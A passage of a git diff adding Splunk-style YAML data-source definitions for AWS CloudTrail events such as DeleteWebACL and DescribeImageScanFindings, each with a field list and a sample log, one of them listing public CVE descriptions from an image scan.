+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.serialNumber
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+ "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}},
+ "eventTime": "2022-10-04T16:13:46Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "DeleteVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "AWS Internal",
+ "userAgent": "AWS Internal", "requestParameters": {"serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"},
+ "responseElements": null, "requestID": "5f192b01-d59d-4cee-8880-cc5cc6fd9b43", "eventID":
+ "01f0258f-b83f-4c0f-8fd3-380473840db8", "readOnly": false, "eventType": "AwsApiCall",
+ "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deletewebacl.yml b/data_sources/aws_cloudtrail_deletewebacl.yml
new file mode 100644
index 0000000000..1c1ed0c711
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletewebacl.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteWebACL
+id: 90da5f08-7961-4c29-8de8-01364982aadf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteWebACL
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.changeToken
+- requestParameters.webACLId
+- responseElements.changeToken
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:32:54Z", "eventSource": "waf.amazonaws.com",
+ "eventName": "DeleteWebACL", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/waf.delete-web-acl", "requestParameters": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425",
+ "webACLId": "6a9771ff-7d94-4fec-a049-e42da0bc7347"}, "responseElements": {"changeToken":
+ "11eb19d6-d960-4398-8761-6a8fbf8fc425"}, "requestID": "55fd5189-5f86-4052-8e8e-993faf1753e8",
+ "eventID": "c8fd51ac-676d-4d5d-aa5a-7e642cf5bb97", "readOnly": false, "eventType":
+ "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_describeeventaggregates.yml b/data_sources/aws_cloudtrail_describeeventaggregates.yml
new file mode 100644
index 0000000000..63a8197dbe
--- /dev/null
+++ b/data_sources/aws_cloudtrail_describeeventaggregates.yml
@@ -0,0 +1,97 @@
+name: AWS CloudTrail DescribeEventAggregates
+id: 7efe4afe-62ae-4f96-81d1-76598ea37fc2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DescribeEventAggregates
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aggregateField
+- requestParameters.filter.eventStatusCodes{}
+- requestParameters.filter.startTimes{}.from
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527",
+ "accessKeyId": "ASIASBMSCQHHQQ6LB24V", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2023-01-31T21:58:17Z", "mfaAuthenticated": "true"}}},
+ "eventTime": "2023-02-01T02:52:34Z", "eventSource": "health.amazonaws.com", "eventName":
+ "DescribeEventAggregates", "awsRegion": "us-east-1", "sourceIPAddress": "54.188.0.152",
+ "userAgent": "AWS Internal", "requestParameters": {"aggregateField": "eventTypeCategory",
+ "filter": {"eventStatusCodes": ["open", "upcoming"], "startTimes": [{"from": "Jan
+ 25, 2023 2:54:32 AM"}]}}, "responseElements": null, "requestID": "d6adf050-1d7a-4c25-9d48-0319e33f6f9a",
+ "eventID": "201cee69-61ab-4ffb-80b7-bd31e81e0d82", "readOnly": true, "eventType":
+ "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory":
+ "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_describeimagescanfindings.yml b/data_sources/aws_cloudtrail_describeimagescanfindings.yml
new file mode 100644
index 0000000000..7f7ac31579
--- /dev/null
+++ b/data_sources/aws_cloudtrail_describeimagescanfindings.yml
@@ -0,0 +1,895 @@
+name: AWS CloudTrail DescribeImageScanFindings
+id: 688ea789-9ba2-4970-90a2-17e541e273c9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DescribeImageScanFindings
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.imageId.imageDigest
+- requestParameters.maxResults
+- requestParameters.repositoryName
+- responseElements.imageId.imageDigest
+- responseElements.imageScanFindings.findingSeverityCounts.HIGH
+- responseElements.imageScanFindings.findingSeverityCounts.INFORMATIONAL
+- responseElements.imageScanFindings.findingSeverityCounts.LOW
+- responseElements.imageScanFindings.findingSeverityCounts.MEDIUM
+- responseElements.imageScanFindings.findingSeverityCounts.UNDEFINED
+- responseElements.imageScanFindings.findings{}.attributes{}.key
+- responseElements.imageScanFindings.findings{}.attributes{}.value
+- responseElements.imageScanFindings.findings{}.description
+- responseElements.imageScanFindings.findings{}.name
+- responseElements.imageScanFindings.findings{}.severity
+- responseElements.imageScanFindings.findings{}.uri
+- responseElements.imageScanFindings.imageScanCompletedAt
+- responseElements.imageScanFindings.vulnerabilitySourceUpdatedAt
+- responseElements.imageScanStatus.description
+- responseElements.imageScanStatus.status
+- responseElements.registryId
+- responseElements.repositoryName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AAAAAAAAAAAAAAAAAAAAA:test@test.com", "arn": "arn:aws:sts::111111111111:assumed-role/role_name/test@test.com",
+ "accountId": "111111111111", "accessKeyId": "AKIAIOSFODNN7EXAMPLE", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AKIAIOSFODNN7EXAMPLE", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/test/region/group", "accountId": "111111111111",
+ "userName": "test"}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-11T09:42:53Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2021-08-11T11:52:27Z", "eventSource":
+ "ecr.amazonaws.com", "eventName": "DescribeImageScanFindings", "awsRegion": "eu-central-1",
+ "sourceIPAddress": "154.16.165.133", "userAgent": "aws-internal/3 aws-sdk-java/1.11.1030
+ Linux/4.9.273-0.1.ac.226.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08
+ java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/legacy", "requestParameters":
+ {"repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"},
+ "maxResults": 1000}, "responseElements": {"registryId": "111111111111", "repositoryName":
+ "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"},
+ "imageScanStatus": {"status": "COMPLETE", "description": "The scan was completed
+ successfully."}, "imageScanFindings": {"imageScanCompletedAt": "Aug 11, 2021, 11:30:16
+ AM", "vulnerabilitySourceUpdatedAt": "Aug 11, 2021, 1:17:52 AM", "findings": [{"name":
+ "CVE-2019-25013", "description": "The iconv feature in the GNU C Library (aka glibc
+ or libc6) through 2.32, when processing invalid multi-byte input sequences in the
+ EUC-KR encoding, may have a buffer over-read.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-25013",
+ "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"},
+ {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2021-33574", "description":
+ "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33
+ has a use-after-free. It may use the notification thread attributes object (passed
+ through its struct sigevent parameter) after it has been freed by the caller, leading
+ to a denial of service (application crash) or possibly unspecified other impact.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2021-33574", "severity":
+ "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+ "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-12886", "description":
+ "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c
+ in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate
+ instruction sequences when targeting ARM targets that spill the address of the stack
+ protector guard, which allows an attacker to bypass the protection of -fstack-protector,
+ -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit
+ against stack overflow by controlling what the stack canary is compared against.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2018-12886", "severity":
+ "MEDIUM", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key":
+ "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-1751", "description":
+ "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling
+ signal trampolines on PowerPC. Specifically, the backtrace function did not properly
+ check the array bounds when storing the frame address, resulting in a denial of
+ service or potential code execution. The highest threat from this vulnerability
+ is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1751",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:C"},
+ {"key": "CVSS2_SCORE", "value": "5.9"}]}, {"name": "CVE-2021-3326", "description":
+ "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier,
+ when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an
+ assertion in the code path and aborts the program, potentially resulting in a denial
+ of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3326",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-35942", "description":
+ "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or
+ read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted,
+ crafted pattern, potentially resulting in a denial of service or disclosure of information.
+ This occurs because atoi was used but strtoul should have been used to ensure correct
+ calculations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-35942",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.4"}]}, {"name": "CVE-2019-12904", "description":
+ "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload
+ side-channel attack because physical addresses are available to other processes.
+ (The C implementation is used on platforms where an assembly-language implementation
+ is unavailable.)", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12904",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"},
+ {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name":
+ "CVE-2017-6363", "description": "** DISPUTED ** In the GD Graphics Library (aka
+ LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c.
+ NOTE: the vendor says \"In my opinion this issue should not have a CVE, since the
+ GD and GD2 formats are documented to be ''obsolete, and should only be used for
+ development and testing purposes.''\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-6363",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+ {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-12290", "description":
+ "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490
+ Section 4.2 when converting A-labels to U-labels. This makes it possible in some
+ circumstances for one domain to impersonate another. By creating a malicious domain
+ that matches a target domain except for the inclusion of certain punycoded Unicode
+ characters (that would be discarded when converted first to a Unicode label and
+ then back to an ASCII label), arbitrary domains can be impersonated.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12290",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.0.5-1+deb10u1"},
+ {"key": "package_name", "value": "libidn2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13115", "description":
+ "In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange
+ in kex.c has an integer overflow that could lead to an out-of-bounds read in the
+ way packets are read from the server. A remote attacker who compromises a SSH server
+ may be able to disclose sensitive information or cause a denial of service condition
+ on the client system when a user connects to the server. This is related to an _libssh2_check_length
+ mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13115", "severity":
+ "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key":
+ "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2016-9318", "description":
+ "libxml2 2.9.4 and earlier, as used in XMLSec 1.2.23 and earlier and other products,
+ does not offer a flag directly indicating that the current document may be read
+ but other files may not be opened, which makes it easier for remote attackers to
+ conduct XML External Entity (XXE) attacks via a crafted document.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9318",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"},
+ {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-16932", "description":
+ "parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter
+ entities.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16932",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"},
+ {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-36309", "description":
+ "ngx_http_lua_module (aka lua-nginx-module) before 0.10.16 in OpenResty allows unsafe
+ characters in an argument when using the API to mutate a URI, or a request or response
+ header.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-36309", "severity":
+ "MEDIUM", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+ {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-14155", "description":
+ "libpcre in PCRE before 8.44 allows an integer overflow via a large number after
+ a (?C substring.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-14155",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2:8.39-12"},
+ {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-3843", "description":
+ "It was discovered that a systemd service that uses DynamicUser property can create
+ a SUID/SGID binary that would be allowed to run as the transient service UID/GID
+ even after the service is terminated. A local attacker may use this flaw to access
+ resources that will be owned by a potentially different service in the future, when
+ the UID/GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3843",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+ {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2019-3844", "description":
+ "It was discovered that a systemd service that uses DynamicUser property can get
+ new privileges through the execution of SUID binaries, which would allow to create
+ binaries owned by the service transient group with the setgid bit set. A local attacker
+ may use this flaw to access resources that will be owned by a potentially different
+ service in the future, when the GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3844",
+ "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+ {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2016-2781", "description":
+ "chroot in GNU coreutils, when used with --userspec, allows local users to escape
+ to the parent session via a crafted TIOCSTI ioctl call, which pushes characters
+ to the terminal''s input buffer.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-2781",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.30-3"},
+ {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name":
+ "CVE-2021-22898", "description": "curl 7.7 through 7.76.1 suffers from an information
+ disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in
+ libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw
+ in the option parser for sending NEW_ENV variables, libcurl could be made to pass
+ on uninitialized data from a stack based buffer to the server, resulting in potentially
+ revealing sensitive internal information to the server using a clear-text network
+ protocol.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22898",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"},
+ {"key": "package_name", "value": "curl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2019-15847", "description":
+ "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize
+ multiple calls of the __builtin_darn intrinsic into a single call, thus reducing
+ the entropy of the random number generator. This occurred because a volatile operation
+ was not specified. For example, within a single execution of a program, the output
+ of every __builtin_darn() call may be the same.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-15847",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.3.0-6"},
+ {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-1752", "description":
+ "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found
+ in the way the tilde expansion was carried out. Directory paths containing an initial
+ tilde followed by a valid username were affected by this issue. A local attacker
+ could exploit this flaw by creating a specially crafted path that, when processed
+ by the glob function, would potentially lead to arbitrary code execution. This was
+ fixed in version 2.32.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1752",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "3.7"}]}, {"name": "CVE-2020-6096", "description":
+ "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation
+ of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU
+ glibc implementation) with a negative value for the ''num'' parameter results in
+ a signed comparison vulnerability. If an attacker underflows the ''num'' parameter
+ to memcpy(), this vulnerability could lead to undefined behavior such as writing
+ to out-of-bounds memory and potentially remote code execution. Furthermore, this
+ memcpy() implementation allows for program execution to continue in scenarios where
+ a segmentation fault or crash should have occurred. The dangers occur in that subsequent
+ execution and iterations of this code will be executed with this corrupted data.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2020-6096", "severity":
+ "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+ "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-10029", "description":
+ "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer
+ during range reduction if an input to an 80-bit long double function contains a
+ non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to
+ sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2020-10029", "severity":
+ "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+ "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2020-27618", "description":
+ "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier,
+ when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388,
+ IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead
+ to an infinite loop in applications, resulting in a denial of service, a different
+ vulnerability from CVE-2016-10228.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-27618",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2016-10228", "description":
+ "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when
+ invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE)
+ along with the -c option, enters an infinite loop when processing invalid multi-byte
+ input sequences, leading to a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-10228",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-19126", "description":
+ "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to
+ ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution
+ after a security transition, allowing local attackers to restrict the possible mapping
+ addresses for loaded libraries and thus bypass ASLR for a setuid program.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2019-19126", "severity": "LOW",
+ "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+ "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-27645", "description":
+ "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6)
+ 2.29 through 2.33, when processing a request for netgroup lookup, may crash due
+ to a double-free, potentially resulting in degraded service or Denial of Service
+ on the local system. This is related to netgroupcache.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-27645",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"},
+ {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2019-14855", "description":
